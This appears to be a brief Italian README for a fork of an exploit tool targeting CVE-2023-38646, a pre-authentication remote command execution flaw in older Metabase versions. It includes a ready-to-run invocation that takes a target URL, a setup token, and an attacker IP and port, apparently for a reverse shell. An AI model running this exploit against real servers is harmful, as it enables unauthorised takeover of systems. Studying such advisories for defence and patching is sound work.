
CVE-2023-38646 RCE pre-autenticazione in Metabase
Fork di kh4sh3i che elimina la necessità di Burp Collector.
CVE-2023-38646 (RCE pre-autenticazione in Metabase):
Metabase open source precedente alla versione 0.46.6.1 e Metabase Enterprise precedente alla versione 1.46.6.1 consentono agli aggressori di eseguire comandi arbitrari sul server, con il livello di privilegi del server. Per lo sfruttamento non è richiesta l'autenticazione.
python3 CVE-2023-38646.py -u http://target.com -t 349fa13d-fd94-4d9b-b54f-b4ebf2df682f -i 10.10.15.101 -p 5555
Per maggiori informazioni leggi questo post.